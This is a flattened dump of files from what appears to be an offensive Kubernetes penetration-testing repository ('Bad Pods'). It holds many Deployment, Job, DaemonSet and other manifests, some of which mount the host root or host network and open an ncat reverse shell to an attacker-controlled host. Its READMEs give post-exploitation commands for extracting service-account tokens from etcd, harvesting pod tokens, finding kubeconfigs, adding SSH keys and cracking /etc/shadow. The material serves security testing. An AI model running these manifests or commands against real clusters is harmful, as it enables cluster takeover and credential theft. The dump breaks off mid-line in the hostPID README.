spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-revshell-replicationcontroller 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/statefulset/hostnetwork-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostnetwork-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostnetwork-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostnetwork-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | containers: 37 | - name: hostnetwork-exec-statefulset 38 | image: ubuntu 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "while true; do sleep 30; done;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | 43 | -------------------------------------------------------------------------------- /manifests/hostnetwork/statefulset/hostnetwork-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostnetwork-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostnetwork-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostnetwork-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | containers: 37 | - name: hostnetwork-revshell-statefulset 38 | image: raesene/ncat 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | 43 | -------------------------------------------------------------------------------- /manifests/hostpath/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #4: Unrestricted hostPath 2 | ![](../../.github/images/Pod4.jpg) 3 | 4 | In this case, even if you don’t have access to the host’s process or network namespaces, if the administrators have not limited what you can mount, you can mount / on the host into your pod, giving you read/write access on the host’s filesystem. This allows you to execute most of the same privilege escalation paths outlined above. There are so many paths available that Ian Coldwater and Duffie Cooley gave an awesome Blackhat 2019 talk about it titled The Path Less Traveled: Abusing Kubernetes Defaults! 5 | 6 | Here are some privileged escalation paths that apply anytime you have access to a Kubernetes node’s filesystem: 7 | * Look for `kubeconfig` files on the host filesystem – If you are lucky, you will find a cluster-admin config with full access to everything. 8 | * Access the tokens from all pods on the node - Use something like access-matrix to see if any of the pods have tokens that give you more permission than you currently have. Look for tokens that have permissions to get secrets in kube-system 9 | * Add your SSH key – If you have network access to SSH to the node, you can add your public key to the node and SSH to it for full interactive access 10 | * Crack hashed passwords – Crack hashes in `/etc/shadow`, see if you can use them to access other nodes 11 | 12 | ## Table of Contents 13 | - [Pod Creation](#pod-creation) 14 | - [Exec pods](#exec-pods) 15 | - [Reverse shell pods](#reverse-shell-pods) 16 | - [Deleting resources](#deleting-resources) 17 | - [Post exploitation](#post-exploitation) 18 | - [Can you run your pod on a control-plane node](#can-you-run-your-pod-on-a-control-plane-node) 19 | - [Read secrets from etcd](#read-secrets-from-etcd) 20 | - [Look for kubeconfigs in the host filesystem](#look-for-kubeconfigs-in-the-host-filesystem) 21 | - [Grab all tokens from all pods on the system](#grab-all-tokens-from-all-pods-on-the-system) 22 | - [Some other ideas](#some-other-ideas) 23 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 24 | - [Demonstrate impact](#demonstrate-impact) 25 | - [References and further reading:](#references-and-further-reading) 26 | 27 | # Pod Creation 28 | ## Exec pods 29 | Create one or more of these resource types and exec into the pod 30 | 31 | **Pod** 32 | ```bash 33 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml 34 | kubectl exec -it hostpath-exec-pod -- bash 35 | ``` 36 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 37 | 38 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 39 | 40 | ```bash 41 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/[RESOURCE_TYPE]/hostpath-exec-[RESOURCE_TYPE].yaml 42 | kubectl get pods | grep hostpath-exec-[RESOURCE_TYPE] 43 | kubectl exec -it hostpath-exec-[RESOURCE_TYPE]-[ID] -- bash 44 | ``` 45 | 46 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 47 | 48 | To troubleshoot a case where you don't see pods, use `kubectl describe` 49 | 50 | ``` 51 | kubectl describe hostpath-exec-[RESOURCE_TYPE] 52 | ``` 53 | 54 | ## Reverse shell pods 55 | Create one or more of these resources and catch the reverse shell 56 | 57 | **Step 1: Set up listener** 58 | ```bash 59 | ncat --ssl -vlp 3116 60 | ``` 61 | 62 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 63 | 64 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 65 | * Replace the HOST and PORT values to point the reverse shell to your listener 66 | 67 | ```bash 68 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostpath/[RESOURCE_TYPE]/hostpath-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 69 | ``` 70 | 71 | **Step 3: Catch the shell and cd to /host** 72 | ```bash 73 | $ ncat --ssl -vlp 3116 74 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 75 | Ncat: Listening on :::3116 76 | Ncat: Listening on 0.0.0.0:3116 77 | Connection received on 10.0.0.162 42035 78 | # cd /host 79 | ``` 80 | 81 | ## Deleting resources 82 | You can delete a resource using it's manifest, or by name. Here are some examples: 83 | ``` 84 | kubectl delete [type] [resource-name] 85 | kubectl delete -f manifests/hostpath/pod/hostpath-exec-pod.yaml 86 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml 87 | kubectl delete pod hostpath-exec-pod 88 | kubectl delete cronjob hostpath-exec-cronjob 89 | ``` 90 | 91 | # Post exploitation 92 | 93 | ## Can you run your pod on a control-plane node 94 | The pod you created above was likely scheduled on a worker node. Before jumping into post exploitation on the worker node, it is worth seeing if you run your a pod on a control-plane node. If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets. This is not a possible on cloud managed Kubernetes clusters like GKE and EKS - they hide the control-plane. 95 | 96 | **Get nodes** 97 | ``` 98 | kubectl get nodes 99 | NAME STATUS ROLES AGE VERSION 100 | k8s-control-plane Ready master 93d v1.19.1 101 | k8s-worker Ready 93d v1.19.1 102 | ``` 103 | 104 | **Pick your manifest, uncomment and update the nodeName field with the name of the control-plane node** 105 | ``` 106 | nodeName: k8s-control-plane 107 | ``` 108 | **Create your pod** 109 | ``` 110 | kubectl apply -f manifests/hostpath/job/hostpath-exec-job.yaml 111 | ``` 112 | 113 | ### Read secrets from etcd 114 | If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 115 | 116 | Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. 117 | 118 | **Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)** 119 | ``` 120 | root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir 121 | ``` 122 | Output: 123 | ``` 124 | data-dir=/var/lib/etcd 125 | ``` 126 | **View the data in etcd database:** 127 | ``` 128 | strings /var/lib/etcd/member/snap/db | less 129 | ``` 130 | 131 | **Extract the tokens from the database and show the service account name** 132 | ``` 133 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done 134 | ``` 135 | 136 | **Same command, but some greps to only return the default token in the kube-system namespace** 137 | ``` 138 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default 139 | ``` 140 | Output: 141 | ``` 142 | 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] 143 | ``` 144 | 145 | 146 | ## Look for kubeconfigs in the host filesystem 147 | 148 | By default, nodes don't have `kubectl` installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing `kubectl` and their highly privileged credentials on the node. We're not so lucky on this GKE node 149 | 150 | **Some ideas:** 151 | ```bash 152 | find / -name kubeconfig 153 | find / -name .kube 154 | grep -R "current-context" /home/ 155 | grep -R "current-context" /root/ 156 | ``` 157 | 158 | ## Grab all tokens from all pods on the system 159 | You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod that has a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding*, that gives you access to do things like create pods or view secrets in all namespaces. 160 | 161 | Look for tokens that have permissions to get secrets in kube-system. 162 | 163 | 164 | **Copy the `can-they.sh` helper script to the pod, download it from github, or manually create it** 165 | ``` 166 | kubectl cp scripts/can-they.sh hostpath-exec-pod:/ 167 | ``` 168 | 169 | **What does `can-they.sh` do?** 170 | * Installs curl and kubectl in the pod (if not installed) 171 | * Grabs all of the tokens from `/host/var/lib/kubelet/pods/*` 172 | * Loops each token against the `selfsubjectaccessreviews` endpoint: `kubectl --token=$token auth can-i [$user-input]` 173 | 174 | **Exec into pod (Don't chroot)** 175 | ``` 176 | kubectl exec -it hostpath-exec-pod -- bash 177 | ``` 178 | 179 | **Run `can-they.sh`** 180 | ``` 181 | ./can-they.sh 182 | ./can-they.sh -i "--list -n kube-system" 183 | ./can-they.sh -i "--list -n default" 184 | ./can-they.sh -i "list secrets -n kube-system" 185 | ./can-they.sh -i "create pods -n kube-system" 186 | ./can-they.sh -i "create clusterrolebindings" 187 | ``` 188 | 189 | **Example Run on AKS showing gatekeeper-admin-token-jmw8z can list secrets in kube-system** 190 | ``` 191 | root@aks-agentpool-76920337-vmss000000:/# ./can-they.sh -i "list secrets -n kube-system" 192 | -------------------------------------------------------- 193 | Token Location: /host/var/lib/kubelet/pods/c888d3a8-743e-41dd-8464-91b3e6628174/volumes/kubernetes.io~secret/gatekeeper-admin-token-jmw8z/token 194 | Command: kubectl auth can-i list secrets -n kube-system 195 | yes 196 | 197 | -------------------------------------------------------- 198 | Token Location: /host/var/lib/kubelet/pods/d13e311b-affa-4fad-b1c4-ec4f7817fd98/volumes/kubernetes.io~secret/metrics-server-token-ftxxd/token 199 | Command: kubectl auth can-i list secrets -n kube-system 200 | no 201 | 202 | ...omitted for brevity... 203 | ``` 204 | 205 | **Can any of the tokens:** 206 | * Create a pod, deployment, etc. in the kube-system namespace? 207 | * Create a role in the kube-system namespace? 208 | * View secrets in the kube-system namespace? 209 | * Create clusterrolebindings? 210 | 211 | You are looking for a way to access to all resources in all namespaces. 212 | 213 | 214 | ## Some other ideas 215 | * Add your public key authorized_keys on the node and ssh to it 216 | * Crack passwords in /etc/shadow, see if you can use them to access control-plane nodes 217 | * Look at the volumes that each of the pods have mounted. You might find some pretty sensitive stuff in there. 218 | 219 | ## Attacks that apply to all pods, even without any special permissions 220 | 221 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 222 | 223 | * Access the cloud metadata service 224 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 225 | * Kubernetes exploits 226 | * Hunting for vulnerable application/services in the cluster 227 | 228 | 229 | # Demonstrate impact 230 | 231 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 232 | 233 | 234 | # References and further reading: 235 | * The Path Less Traveled: Abusing Kubernetes Defaults - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 236 | * [The Most Pointless Kubernetes Command Ever](https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/) 237 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) 238 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 239 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 240 | 241 | 242 | -------------------------------------------------------------------------------- /manifests/hostpath/cronjob/hostpath-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpath-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: hostpath-exec-cronjob 16 | image: ubuntu 17 | volumeMounts: 18 | - mountPath: /host 19 | name: noderoot 20 | command: [ "/bin/sh", "-c", "--" ] 21 | args: [ "while true; do sleep 30; done;" ] 22 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 23 | volumes: 24 | - name: noderoot 25 | hostPath: 26 | path: / 27 | restartPolicy: OnFailure 28 | -------------------------------------------------------------------------------- /manifests/hostpath/cronjob/hostpath-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpath-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: hostpath-revshell-cronjob 16 | image: raesene/ncat 17 | volumeMounts: 18 | - mountPath: /host 19 | name: noderoot 20 | command: [ "/bin/sh", "-c", "--" ] 21 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 22 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 23 | volumes: 24 | - name: noderoot 25 | hostPath: 26 | path: / 27 | restartPolicy: OnFailure 28 | -------------------------------------------------------------------------------- /manifests/hostpath/deamonset/hostpath-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpath-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: hostpath-exec-daemonset 21 | image: ubuntu 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/deamonset/hostpath-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpath-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: hostpath-revshell-daemonset 21 | image: raesene/ncat 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/deployment/hostpath-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpath-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: hostpath-exec-deployment 22 | image: ubuntu 23 | volumeMounts: 24 | - mountPath: /host 25 | name: noderoot 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "while true; do sleep 30; done;" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 29 | volumes: 30 | - name: noderoot 31 | hostPath: 32 | path: / 33 | -------------------------------------------------------------------------------- /manifests/hostpath/deployment/hostpath-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpath-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: hostpath-revshell-deployment 22 | image: raesene/ncat 23 | volumeMounts: 24 | - mountPath: /host 25 | name: noderoot 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 29 | volumes: 30 | - name: noderoot 31 | hostPath: 32 | path: / 33 | -------------------------------------------------------------------------------- /manifests/hostpath/job/hostpath-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpath-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: hostpath-exec-job 13 | image: ubuntu 14 | volumeMounts: 15 | - mountPath: /host 16 | name: noderoot 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "while true; do sleep 30; done;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | volumes: 21 | - name: noderoot 22 | hostPath: 23 | path: / 24 | restartPolicy: OnFailure 25 | -------------------------------------------------------------------------------- /manifests/hostpath/job/hostpath-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpath-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: hostpath-revshell-job 13 | image: raesene/ncat 14 | volumeMounts: 15 | - mountPath: /host 16 | name: noderoot 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | volumes: 21 | - name: noderoot 22 | hostPath: 23 | path: / 24 | restartPolicy: OnFailure 25 | -------------------------------------------------------------------------------- /manifests/hostpath/pod/hostpath-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpath-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: hostpath-exec-pod 10 | image: ubuntu 11 | volumeMounts: 12 | - mountPath: /host 13 | name: noderoot 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "while true; do sleep 30; done;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on a control-plane node by uncommenting this line and changing to a control-plane node name 17 | volumes: 18 | - name: noderoot 19 | hostPath: 20 | path: / 21 | -------------------------------------------------------------------------------- /manifests/hostpath/pod/hostpath-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpath-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: hostpath-revshell-pod 10 | image: raesene/ncat 11 | volumeMounts: 12 | - mountPath: /host 13 | name: noderoot 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 17 | volumes: 18 | - name: noderoot 19 | hostPath: 20 | path: / 21 | -------------------------------------------------------------------------------- /manifests/hostpath/replicaset/hostpath-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpath-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: hostpath-exec-replicaset 21 | image: ubuntu 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/replicaset/hostpath-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpath-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: hostpath-revshell-replicaset 21 | image: raesene/ncat 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/replicationcontroller/hostpath-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpath-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: hostpath-exec-replicationcontroller 21 | image: ubuntu 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/replicationcontroller/hostpath-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpath-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: hostpath-revshell-replicationcontroller 21 | image: raesene/ncat 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/statefulset/hostpath-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpath-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpath-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpath-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: hostpath-exec-statefulset 37 | image: ubuntu 38 | volumeMounts: 39 | - mountPath: /host 40 | name: noderoot 41 | command: [ "/bin/sh", "-c", "--" ] 42 | args: [ "while true; do sleep 30; done;" ] 43 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 44 | volumes: 45 | - name: noderoot 46 | hostPath: 47 | path: / 48 | -------------------------------------------------------------------------------- /manifests/hostpath/statefulset/hostpath-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpath-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpath-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpath-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: hostpath-revshell-statefulset 37 | image: raesene/ncat 38 | volumeMounts: 39 | - mountPath: /host 40 | name: noderoot 41 | command: [ "/bin/sh", "-c", "--" ] 42 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 43 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 44 | volumes: 45 | - name: noderoot 46 | hostPath: 47 | path: / 48 | -------------------------------------------------------------------------------- /manifests/hostpid/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #5: hostPID 2 | ![](../../.github/images/Pod5.jpg) 3 | 4 | There’s no clear path to get root on the node with only `hostPID`, but there are still some good post exploitation opportunities. 5 | * **View processes on the host** – When you run ps from within a pod that has hostPID: true, you see all the processes running on the host, including processes running within each pod. 6 | * **View the environment variables for each pod on the host** - With hostPID: true, you can read the /proc/[PID]/environ file for each process running on the host, including all processes running in pods. 7 | * **View the file descriptors for each pod on the host** - With hostPID: true, you can read the /proc/[PID]/fd[X] for each process running on the host, including all of the processes running in pods. Some of these allow you to read files that are opened within pods. 8 | * **Look for passwords, tokens, keys, etc.** – If you are lucky, you will find credentials and you’ll be able to use them to escalate privileges within the cluster, to escalate privileges services supported by the cluster, or to escalate privileges services that cluster-hosted applications are communicating with. It is a long shot, but you might find a Kubernetes service account token or some other authentication material that will allow you to access other namespaces and eventually escalate all the way up to cluster admin. 9 | * **Kill processes** – You can also kill any process on the node (presenting a denial-of-service risk), but I would advise against it on a penetration test! 10 | 11 | ## Table of Contents 12 | - [Bad Pod #5: 